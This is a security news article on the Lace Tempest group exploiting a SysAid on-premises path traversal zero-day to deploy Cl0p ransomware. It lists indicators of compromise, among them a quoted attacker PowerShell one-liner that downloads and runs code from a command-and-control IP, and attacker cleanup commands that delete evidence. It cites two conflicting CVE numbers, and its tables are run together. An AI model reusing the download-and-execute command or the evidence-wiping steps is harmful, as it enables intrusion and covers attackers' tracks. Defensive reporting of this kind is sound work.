Friday, December 1, 2023

MOVEit Hackers Turn to SysAid Servers Zero-Day Vulnerability

As previously reported, SysAid disclosed a zero-day issue affecting on-premises SysAid servers. The vulnerability was found to be a path traversal vulnerability and was given CVE-2023-47426.

Additionally, SysAid stated that there were reports of Lace Tempest exploiting the vulnerability in the wild.

Moreover, Microsoft Threat Intelligence Team analysis mentioned that the Lace Tempest threat actor has exploited this vulnerability to deploy Cl0p ransomware on affected systems.

This threat actor is the same who exploited MOVEit Transfer applications and GoAnywhere MFT extortion attacks.

Rapid7 Analysis

According to the reports shared with Cyber Security News, Rapid7 has been analyzing this vulnerability on SysAid servers. SysAid’s security advisory mentioned that the threat actor used this vulnerability to upload a WAR archive consisting of WebShell and other payloads. 

These were uploaded to the root of SysAid’s Tomcat web service as part of exploitation. It was also reported that the threat actors used three processes, spoolsv.exe, msiexec.exe, and svchost.exe, for exploitation purposes.

However, post-exploitation was done by deploying the MeshAgent remote administration tool and GraceWire malware on the affected devices.

SysAid claims to have 5000 customers and has been proactively communicating with them for mitigation steps. SysAid has also released patches to fix these vulnerabilities.


Protect Your Storage With SafeGuard

Is Your Storage & Backup Systems Fully Protected? – Watch 40-second Tour of SafeGuard

StorageGuard scans, detects, and fixes security misconfigurations and vulnerabilities across hundreds of storage and backup devices.


CVE-2023-47246, which exists in SysAid On-premises servers, can be fixed in version 23.3.36. Customers of SysAid servers are recommended to apply the necessary patches as a priority to prevent threat actors from exploiting the weaknesses on the servers.

Indicators of Compromise


FilenameSha256Commentuser.exeb5acf14cdac40be590318dee95425d0746e85b1b7b1cbd14da66f21f2522bf4dMalicious loaderMeshagent.exe2035a69bc847dbad3b169cc74eb43fc9e6a0b6e50f0bbad068722943a71a4ccaMeshagent.exe remote admin tool

IP Addresses

IPComment81.19.138[.]52GraceWire Loader C245.182.189[.]100GraceWire Loader C2179.60.150[.]34Cobalt Strike C245.155.37[.]105Meshagent remote admin tool (C2)

File Paths

PathCommentC:Program FilesSysAidServertomcatwebappsusersfilesuser.exeGraceWireC:Program FilesSysAidServertomcatwebappsusersfiles.warArchive of WebShells and tools used by the attackerC:Program FilesSysAidServertomcatwebappsleaveUsed as a flag for the attacker scripts during execution



C:WindowsSystem32WindowsPowerShellv1.0powershell.exe powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(‘http://179.60.150[.]34:80/a’)

Post-Compromise Cleanup

Remove-Item -Path “$tomcat_dirwebappsusersfilesleave”.

Remove-Item -Force “$wappsusersfiles.war”.

Remove-Item -Force “$wappsusersfilesuser.*”.

& “$wappsusersfilesuser.exe”.

Antivirus Detections




Patch Manager Plus, the one-stop solution for automated updates of over 850 third-party applications: Try Free Trial.

The post MOVEit Hackers Turn to SysAid Servers Zero-Day Vulnerability appeared first on Cyber Security News.

   Read More 

Cyber Security News